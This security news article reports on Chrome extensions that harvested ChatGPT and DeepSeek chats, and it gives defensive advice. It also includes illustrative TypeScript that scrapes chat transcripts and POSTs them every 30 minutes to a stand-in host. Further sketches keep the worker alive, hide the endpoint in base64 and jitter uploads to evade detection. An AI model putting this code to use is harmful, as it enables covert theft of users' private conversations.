📰 INDUSTRY NEWS

Chrome Extensions Caught Harvesting ChatGPT & DeepSeek Chats: A Wake-Up Call for AI Privacy

📅 December 31, 2025 ⏱️ 8 min read

📋 TL;DR

Security researchers discovered two Chrome extensions with over 900,000 combined installations secretly harvesting users' ChatGPT and DeepSeek chat histories. Despite one of them bearing Google's "Featured" badge, the extensions exfiltrated sensitive AI conversations every 30 minutes, potentially exposing proprietary code, personal data, and corporate secrets.

The Hidden Threat in Your Browser: AI Chat Data at Risk

In a revelation that underscores the growing security challenges of the AI era, researchers at OX Security have uncovered a malware campaign targeting users of popular AI chat services. Two Chrome extensions, masquerading as legitimate AI productivity tools, have been systematically harvesting sensitive chat data from ChatGPT and DeepSeek users, with combined installations exceeding 900,000.

The discovery highlights how easily malicious actors can exploit the trust users place in browser extensions when interacting with AI services. Even more concerning, one of the extensions bears Google's "Featured" badge, a designation typically associated with verified, high-quality applications.

The Malicious Extensions Uncovered

Security researchers identified two primary extensions involved in the data harvesting operation:

1. Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI

This extension boasts over 600,000 users and prominently displays Google's "Featured" badge. Marketed as a comprehensive AI assistant tool, it promises seamless integration with multiple AI models including ChatGPT, Claude, and DeepSeek. The extension adds a sidebar interface that appears to enhance productivity by providing quick access to AI capabilities across any website.

2. AI Sidebar with Deepseek, ChatGPT, Claude, and more

With over 300,000 installations, this extension positions itself as a universal AI companion. It offers similar functionality, claiming to bring the power of multiple AI models to users' fingertips through a convenient sidebar interface. The extension's description emphasizes productivity enhancement and seamless AI integration.

How the Attack Works

The malicious extensions employ a sophisticated dual-function approach that makes them particularly dangerous:

Legitimate Functionality as a Smokescreen

Both extensions deliver on their promised features, providing functional AI integration tools. That legitimate functionality serves as cover for the malicious activity: users get exactly what they installed, with no obvious performance issues or suspicious behavior to raise suspicion.

Systematic Data Exfiltration

Every 30 minutes, the extensions silently transmit users' AI chat histories to external servers (a hedged sketch of the general pattern follows this list). The harvested data includes:

  • Complete conversation logs with ChatGPT and DeepSeek
  • Browsing activity and website interactions
  • Personal, corporate, and otherwise sensitive information inadvertently shared during those conversations
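
OX Security has not published the extensions' source code, so the exact implementation is unknown. Purely as an illustration of the pattern described above, a 30-minute exfiltration loop in a Manifest V3 extension could be as simple as the following sketch; the DOM selector, message name, and collector URL are all invented:

```typescript
// Hypothetical reconstruction; NOT the extensions' actual code.

// content-script.ts: injected into the AI chat pages; replies to the
// background worker with the visible transcript when asked.
chrome.runtime.onMessage.addListener((msg, _sender, sendResponse) => {
  if (msg.type === 'DUMP_CHAT') {
    const turns = Array.from(document.querySelectorAll('[data-message]')) // invented selector
      .map((el) => el.textContent ?? '');
    sendResponse({ url: location.href, turns });
  }
});

// background.ts: MV3 service worker; fires every 30 minutes.
chrome.alarms.create('sync', { periodInMinutes: 30 });

chrome.alarms.onAlarm.addListener(async (alarm) => {
  if (alarm.name !== 'sync') return;
  const tabs = await chrome.tabs.query({
    url: ['https://chatgpt.com/*', 'https://chat.deepseek.com/*'],
  });
  for (const tab of tabs) {
    if (tab.id === undefined) continue;
    const payload = await chrome.tabs.sendMessage(tab.id, { type: 'DUMP_CHAT' });
    // The exfiltration itself is just an ordinary-looking HTTPS POST.
    await fetch('https://collector.example/logs', {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify(payload),
    });
  }
});
```

Notice how little of this looks anomalous in isolation: alarms, tab messaging, and HTTPS POSTs are exactly what a legitimate sidebar extension also does.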

Persistent Covert Operations

The extensions maintain persistent background connections, ensuring continuous data collection even when users aren't actively engaging with the AI features. This always-on approach maximizes the amount of data harvested while minimizing the chances of detection.
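
OX Security's write-up does not detail the persistence mechanism, but Manifest V3 service workers are normally suspended after roughly 30 seconds of inactivity, so "always-on" behavior has to be manufactured. One widely documented keep-alive trick, shown here only as an assumption about how it could work:

```typescript
// background.ts keep-alive sketch. Calling any extension API resets the
// service worker's idle timer (Chrome 110+), so a cheap no-op call on a
// short interval keeps the worker (and its collection logic) alive.
setInterval(() => {
  chrome.runtime.getPlatformInfo(() => {
    /* no-op: the API call itself is what resets the idle timer */
  });
}, 20_000); // every 20 s, safely under the ~30 s suspension threshold
```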

The Scope of Exposure

The implications of this breach extend far beyond simple data theft. AI conversations often contain highly sensitive information, including:

Corporate Intelligence

Users frequently share proprietary code, business strategies, financial data, and confidential documents with AI assistants for analysis or optimization. This information, now in the hands of malicious actors, could be weaponized for:

  • Corporate espionage and competitive intelligence
  • Insider trading based on confidential financial information
  • Targeted attacks on specific organizations
  • Intellectual property theft

Personal Data Compromise

Individual users often discuss personal matters, share private documents, or seek advice on sensitive topics with AI assistants. The harvested data could enable:

  • Identity theft and financial fraud
  • Blackmail and extortion schemes
  • Targeted phishing campaigns based on personal information
  • Social engineering attacks

Security Infrastructure Vulnerabilities

Developers and IT professionals regularly use AI assistants to debug code, discuss security implementations, and troubleshoot infrastructure issues. Exposed information could reveal:

  • System vulnerabilities and security flaws
  • Network architecture details
  • Authentication mechanisms and access protocols
  • Database structures and API endpoints

Technical Analysis: The Anatomy of the Attack

From a technical perspective, the extensions exploit several vulnerabilities in the Chrome extension ecosystem:

Permission Abuse

The extensions likely request broad permissions under the guise of functionality requirements (an illustrative manifest excerpt follows this list), including:

  • Access to all websites (for the sidebar feature)
  • Reading and modifying browser data
  • Network communication capabilities
  • Storage access for "optimization" purposes
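
On paper, such a grant list is indistinguishable from what an honest "AI sidebar on every page" genuinely needs, which is why permission review alone rarely catches this class of abuse. An illustrative Manifest V3 excerpt (not the actual manifest of either extension):

```json
{
  "manifest_version": 3,
  "name": "AI Sidebar (illustrative)",
  "version": "1.0.0",
  "permissions": ["storage", "tabs", "alarms", "scripting"],
  "host_permissions": ["<all_urls>"],
  "background": { "service_worker": "background.js" },
  "content_scripts": [
    { "matches": ["<all_urls>"], "js": ["content-script.js"] }
  ]
}
```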

Obfuscated Code Implementation

Malicious functionality is typically hidden within legitimate code (a toy example of the first technique follows this list), using methods such as:

  • Code obfuscation to hide malicious functions
  • Dynamic code loading to bypass static analysis
  • Encryption of exfiltrated data to avoid detection
  • Use of legitimate-looking domains for data transmission
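
As a toy example of the first technique, even trivial encoding keeps indicators such as a collector URL out of a naive static scan (the domain below is reserved and non-functional):

```typescript
// A grep for "https://" across this source finds nothing: the endpoint
// only materializes at runtime. Real campaigns layer far heavier
// obfuscation on top, but the evasion principle is identical.
const endpoint = atob('aHR0cHM6Ly9jb2xsZWN0b3IuZXhhbXBsZS9sb2dz');
// decodes to "https://collector.example/logs"
```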

Evasion Techniques

The extensions employ various evasion methods to avoid detection (the first is sketched after this list):

  • Staggered data transmission to avoid pattern recognition
  • Use of HTTPS to blend with normal web traffic
  • Minimal system resource usage to avoid performance flags
  • Legitimate-looking network requests that mimic API calls
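
Staggered transmission deserves a concrete sketch: instead of a fixed period that leaves a clean 30-minute signature in network logs, each upload can schedule the next one at a randomized offset. Again, this is an illustration of the technique, not recovered code:

```typescript
// Staggered beaconing: no fixed interval for a detector to lock onto.
async function uploadBatch(): Promise<void> {
  // hypothetical upload routine, as in the earlier exfiltration sketch
}

function scheduleNext(): void {
  const delayInMinutes = 25 + Math.random() * 10; // 25 to 35 min, invented window
  chrome.alarms.create('sync', { delayInMinutes });
}

chrome.alarms.onAlarm.addListener((alarm) => {
  if (alarm.name !== 'sync') return;
  void uploadBatch();
  scheduleNext(); // re-arm with fresh jitter after every run
});

scheduleNext();
```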

Google's Response and Platform Vulnerabilities

The fact that one extension bears Google's "Featured" badge raises serious questions about the platform's security review processes. Although OX Security notified Google of the findings, the extensions remained available as of December 30, 2025, highlighting potential gaps in:

Review Process Inadequacies

  • Insufficient code analysis during the approval process
  • Limited behavioral monitoring of extensions post-publication
  • Inadequate verification of developer identities and intentions
  • Delayed response to reported security issues

The Featured Badge Paradox

The presence of a "Featured" badge on a malicious extension creates a false sense of security, potentially increasing the number of victims. This suggests that:

  • Featured status may be based on popularity rather than security
  • Manual review processes may miss sophisticated threats
  • Automated scanning tools require enhancement

Protecting Yourself: Immediate Actions and Long-term Strategies

Immediate Steps

If you suspect you may have installed these extensions:

  1. Immediately remove the suspicious extensions from Chrome
  2. Clear browser cache and cookies
  3. Review recent AI conversations for sensitive information exposure
  4. Change passwords for accounts discussed with AI assistants
  5. Monitor financial accounts for unusual activity

Extension Security Best Practices

Moving forward, adopt these security measures:

  • Limit extensions to those from verified developers with established reputations
  • Carefully review permissions requested by each extension
  • Regularly audit installed extensions and remove unnecessary ones (a small audit helper is sketched after this list)
  • Use browser profiles to isolate work and personal browsing
  • Consider using dedicated browsers for sensitive AI interactions
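
To make the regular audit less manual, an extension granted the "management" permission can enumerate everything installed and flag broad host access. A minimal sketch (the flagging heuristic is illustrative, not an established detection rule):

```typescript
// audit.ts: requires "management" in the auditing extension's manifest.
// Flags enabled extensions that can read every site the user visits.
chrome.management.getAll((extensions) => {
  for (const ext of extensions) {
    const hosts = ext.hostPermissions ?? [];
    const readsEverySite = hosts.some(
      (p) => p === '<all_urls>' || p.startsWith('*://*/')
    );
    if (ext.enabled && readsEverySite) {
      console.warn(`Review ${ext.name} (${ext.id}): ${hosts.join(', ')}`);
    }
  }
});
```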

Enterprise Security Measures

Organizations should implement:

  • Browser extension policies restricting installations to approved extensions (an example policy follows this list)
  • Regular security awareness training on extension risks
  • Network monitoring to detect suspicious data transmissions
  • Endpoint detection and response (EDR) solutions
  • Regular security audits of browser environments
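
The first measure is directly enforceable through Chrome's enterprise policies: block all extensions by default, then allowlist approved IDs. ExtensionInstallBlocklist and ExtensionInstallAllowlist are the actual policy names; the 32-character extension ID below is a placeholder. Deployed, for example, as a managed-policy JSON file on Linux (or via the equivalent Group Policy settings on Windows):

```json
{
  "ExtensionInstallBlocklist": ["*"],
  "ExtensionInstallAllowlist": ["abcdefghijklmnopabcdefghijklmnop"]
}
```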

The Broader Implications for AI Security

This incident reveals fundamental security challenges in the AI ecosystem:

Trust Model Vulnerabilities

The attack exploits the trust users place in both AI assistants and browser extensions, creating a compound vulnerability that amplifies the risk of data exposure.

Data Persistence Challenges

Unlike traditional data breaches that involve specific databases, this attack captures dynamic, ongoing conversations that may contain increasingly sensitive information over time.

Regulatory Considerations

The incident raises questions about liability and responsibility when AI interactions are compromised, particularly regarding compliance with data protection regulations like GDPR and CCPA.

Looking Ahead: The Future of AI Privacy

As AI integration deepens across all aspects of digital life, several developments are crucial:

Enhanced Browser Security

Browser vendors must implement more rigorous extension review processes, including:

  • Real-time behavioral analysis of extensions
  • Machine learning-based threat detection
  • User-friendly permission management systems
  • Rapid response mechanisms for reported threats

AI Service Provider Responsibilities

Companies like OpenAI and DeepSeek should consider:

  • Browser extension security guidelines for users
  • Detection mechanisms for unauthorized data access
  • Encrypted communication protocols with browser extensions
  • User education about privacy risks

User Education and Awareness

The AI community must prioritize educating users about:

  • Privacy implications of AI conversations
  • Best practices for secure AI usage
  • Recognition of potential security threats
  • Regular security hygiene practices

Conclusion: A Call for Vigilance

The discovery of malicious Chrome extensions harvesting ChatGPT and DeepSeek conversations serves as a critical wake-up call for the AI community. With over 900,000 installations and counting, the scale of potential data exposure is staggering. The incident underscores the need for heightened vigilance as AI tools become increasingly integrated into our daily workflows.

As we continue to embrace AI assistants for everything from creative writing to code development, maintaining security awareness becomes paramount. The convenience of AI integration must never come at the cost of data privacy and security. Users, developers, and platform providers all share responsibility for creating a secure AI ecosystem that protects sensitive information while enabling innovation.

The challenge moving forward is clear: we must develop security frameworks that can keep pace with rapid AI advancement while maintaining the user trust essential for widespread adoption. Only through collaborative efforts between security researchers, platform providers, and users can we ensure that the AI revolution doesn't become a privacy nightmare.

Key Features

  • 🛡️ Browser Extension Security: advanced techniques for identifying and mitigating malicious browser extensions
  • 🔍 AI Privacy Protection: methods for securing AI conversations and preventing data exfiltration
  • Real-time Threat Detection: monitoring systems to detect suspicious extension behavior
  • 📊 Data Exposure Analysis: understanding the scope and impact of compromised AI conversations

✅ Strengths

  • Heightened awareness of browser extension security risks
  • Improved understanding of AI privacy vulnerabilities
  • Enhanced security practices for AI tool usage
  • Development of better detection mechanisms for malicious extensions

⚠️ Considerations

  • Significant data exposure for affected users
  • Erosion of trust in browser extension ecosystems
  • Potential for widespread corporate espionage
  • Delayed response times from platform providers

🚀 Learn how to secure your AI workflows and protect against extension-based threats

security privacy chrome-extensions chatgpt deepseek malware data-breach ai-security